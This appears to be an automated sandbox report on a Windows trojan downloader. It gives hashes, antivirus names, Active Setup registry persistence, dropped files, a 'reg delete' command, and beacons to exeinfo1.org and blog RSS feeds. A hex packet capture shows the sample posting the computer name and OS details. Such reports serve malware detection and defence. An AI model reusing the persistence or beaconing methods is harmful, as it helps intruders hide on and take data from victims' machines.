Analysis Date2014-01-28 02:00:24
MD51bdc3222ec8c876eb93db25169a4dec5
SHA145c659ae58e93a76ccbf719af874139e320d3013

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.xzYD md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.xzYD md5: 7fd1c91216ccb78fa46ea2cf84fb63dd sha1: b09b5e817e649d13d6a400d54e661c0ad7583b81 size: 21504
Section.xzYD md5: 36bba4742a400aa8fdf86bb81147490b sha1: 74e4d0bdcedeefaef2c08ab0cfceecd63533e756 size: 5632
Section.xzYD md5: 417846261dcffadab7aac4805305c55f sha1: 42335e6ab5f3d3f51c60d5394cd4609ebca4fdd3 size: 2560
Section.xzYD md5: 0e229d735bc6e15ddb9c9f80701a38ef sha1: 2c1b9547faaccad0d3ef488913cc032ef40ac944 size: 1024
Timestamp2013-05-10 13:13:04
PackerUPX v0.80 - v0.84
PEhash36a92a0dbe81f030c7eeabfa7d7b6ff55b3c730c
AVaviraTR/ATRAPS.Gen
AVmcafeeMalware.ja
AVavgWin32/DH{IHk/JCJbAwAPOSUBNgo}
AVmsseTrojanDownloader:Win32/Kanav

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\5038539457536109\stubpath ➝
C:\Program Files\Common Files\Apple\Mobile Device Support\apple.exe\\x00
Creates FileC:\Program Files\Common Files\Apple\Mobile Device Support\apple.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.bat
Creates Processreg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\5038539457536109" /f
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\1.bat
Winsock URLhttp://lokias111234.blog.163.com/rss/
Winsock URLhttp://opaoxf112.blog.163.com/rss/
Winsock URLhttp://blog.daum.net/xml/rss/opaoxf2
Winsock URLhttp://blog.chosun.com/rss/freebirdf1

Process
↳ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\5038539457536109" /f

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\1.bat

Network Details:

DNSexeinfo1.org
Type: A
184.168.221.82
DNSblog.chosun.com
Type: A
218.145.28.99
DNSblog.daum.net
Type: A
180.70.134.40
DNSblog.daum.net
Type: A
180.70.93.11
DNSblog.163.com
Type: A
101.71.8.132
DNSblog.163.com
Type: A
101.71.8.131
DNSblog.163.com
Type: A
101.71.8.131
DNSblog.163.com
Type: A
101.71.8.132
DNSopaoxf112.blog.163.com
Type: A
DNSlokias111234.blog.163.com
Type: A
HTTP POSThttp://exeinfo1.org/pro1.asp
User-Agent:
HTTP GEThttp://blog.chosun.com/rss/freebirdf1
User-Agent: Testing
HTTP GEThttp://blog.daum.net/xml/rss/opaoxf2
User-Agent: Testing
HTTP GEThttp://opaoxf112.blog.163.com/rss/
User-Agent: Testing
HTTP GEThttp://lokias111234.blog.163.com/rss/
User-Agent: Testing
Flows TCP192.168.1.1:1031 ➝ 184.168.221.82:80
Flows TCP192.168.1.1:1032 ➝ 218.145.28.99:80
Flows TCP192.168.1.1:1033 ➝ 180.70.134.40:80
Flows TCP192.168.1.1:1034 ➝ 101.71.8.132:80
Flows TCP192.168.1.1:1035 ➝ 101.71.8.131:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7072 6f312e61 73702048   POST /pro1.asp H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a6578   TTP/1.1..Host:ex
0x00000020 (00032)   65696e66 6f312e6f 72670d0a 436f6e74   einfo1.org..Cont
0x00000030 (00048)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000040 (00064)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000050 (00080)   2d75726c 656e636f 6465640d 0a436f6e   -urlencoded..Con
0x00000060 (00096)   74656e74 2d4c656e 6774683a 3138370d   tent-Length:187.
0x00000070 (00112)   0a0d0a61 313d434f 4d505554 45522d58   ...a1=COMPUTER-X
0x00000080 (00128)   58585858 58266132 3d585858 58585858   XXXXX&a2=XXXXXXX
0x00000090 (00144)   58585858 58585858 58585858 58585858   XXXXXXXXXXXXXXXX
0x000000a0 (00160)   58666461 62383130 37343736 35366537   Xfdab810747656e7
0x000000b0 (00176)   35363936 65363534 39366537 34363536   5696e65496e74656
0x000000c0 (00192)   63266133 3d266134 3d4d6963 726f736f   c&a3=&a4=Microso
0x000000d0 (00208)   66742532 3057696e 646f7773 25323058   ft%20Windows%20X
0x000000e0 (00224)   50253230 50726f66 65737369 6f6e616c   P%20Professional
0x000000f0 (00240)   25323026 61363d3a 73766326 61373d34   %20&a6=:svc&a7=4
0x00000100 (00256)   35633635 39616535 38653933 61373663   5c659ae58e93a76c
0x00000110 (00272)   63626637 31396166 38373431 33396533   cbf719af874139e3
0x00000120 (00288)   32306433 3031332e 6578650d 0a0d0a     20d3013.exe....

0x00000000 (00000)   47455420 2f727373 2f667265 65626972   GET /rss/freebir
0x00000010 (00016)   64663120 48545450 2f312e31 0d0a5573   df1 HTTP/1.1..Us
0x00000020 (00032)   65722d41 67656e74 3a205465 7374696e   er-Agent: Testin
0x00000030 (00048)   670d0a48 6f73743a 20626c6f 672e6368   g..Host: blog.ch
0x00000040 (00064)   6f73756e 2e636f6d 0d0a4361 6368652d   osun.com..Cache-
0x00000050 (00080)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000060 (00096)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f786d6c 2f727373 2f6f7061   GET /xml/rss/opa
0x00000010 (00016)   6f786632 20485454 502f312e 310d0a55   oxf2 HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a2054 65737469   ser-Agent: Testi
0x00000030 (00048)   6e670d0a 486f7374 3a20626c 6f672e64   ng..Host: blog.d
0x00000040 (00064)   61756d2e 6e65740d 0a436163 68652d43   aum.net..Cache-C
0x00000050 (00080)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000060 (00096)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f727373 2f204854 54502f31   GET /rss/ HTTP/1
0x00000010 (00016)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000020 (00032)   54657374 696e670d 0a486f73 743a206f   Testing..Host: o
0x00000030 (00048)   70616f78 66313132 2e626c6f 672e3136   paoxf112.blog.16
0x00000040 (00064)   332e636f 6d0d0a43 61636865 2d436f6e   3.com..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..

0x00000000 (00000)   47455420 2f727373 2f204854 54502f31   GET /rss/ HTTP/1
0x00000010 (00016)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000020 (00032)   54657374 696e670d 0a486f73 743a206c   Testing..Host: l
0x00000030 (00048)   6f6b6961 73313131 3233342e 626c6f67   okias111234.blog
0x00000040 (00064)   2e313633 2e636f6d 0d0a4361 6368652d   .163.com..Cache-
0x00000050 (00080)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000060 (00096)   650d0a0d 0a                           e....


Strings

3f333
fff3f
0123456789ABCDEF
04A2AF0B
0 4[_^][YY
1.baUaq.Y
1&<>P<
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
'3#0;9nd
#32770
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
35pur+virtu!3_l
35%R(BuXD
3C:\r >k
_3_m63
43224682503853979568992877482445
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4z4~4
~4]7X[d
4MTLD<4,4M
4Up(90
5"5&5*5.52565:5>5B5F5J5N5R5V5Z5^5b5
-7?7A0
8pUAj#%
_, (8PX
'](%9;
_932.d>Gv
AB8cXPCXa
&&abYYSMD.
?AC98D
A"dtgN
ADVAPI32.dll
a/lock
argu(s_02f
asp HTT
A\T~fs
B'hw{u
B(lJm6/09OF3
Bo'm8e+
c+8F$o D
;+CFIS
>C"HKEY_CURRENT_USE
ckCouvI
 C`KL4
/;[?d]a
dd7#xb
DebugStr
del "%s"	z
du(Ty1C
/dvanck
dxAOEMCP	
ED	06DFJ
E.O,'_V
ErU0B=
essageBoxAws-
ExitProcess
f1j1n1r1v1z1~1
Fe t		
Fgk#jD
Files\CommT
FIp#s5
'Flush
fpq.ZY	W
GetAdaptersInfo
GetLaFA
GetProcAddress
__GLOBAL_HEAP_SELECTED
gXho,I
!h$67=
heap7'7no
H)%hp#
hPq?V,
http://w.nav
^I j K
iphlpapi.dll
?I"U4ZV*E?q.BqG
KAA28V.{gC
- Kablto iniVa
KERNEL32.DLL
,klwn>C
KOFTWA)
L	CloseHand
lErcmpiT
l)hT)FV_
LoadLibraryA
lUnw0dlP
L}Xt7J
me error
M!_*ex\/X
MSVCRT7run
mws_opeX1so
NamILCM|
nj6ByP
NU=t0L
{^opGre
o+YSTEM4Cu
+:'^\P,
p4Uv-	
pAll9g
p@gram 
PP"^r?
.PSm`~
q3x<u[Su%SN
qC|		B
%QFq:YY
[QsN;L
q|U`>Qy
RegCloseKey
{;S7sg_
spac#fv
?t:1t.(
t61I&D
!This program cannot be run in DOS mode.
ToedeC5
V700WP
v95c}R
VC20XCt
ViewOfX)
V+vP]s
wat7Ax
w{lowi8a
)w(nul
w+%=Pa
WS2_32.dll
!(WsU#<
Y=l9,7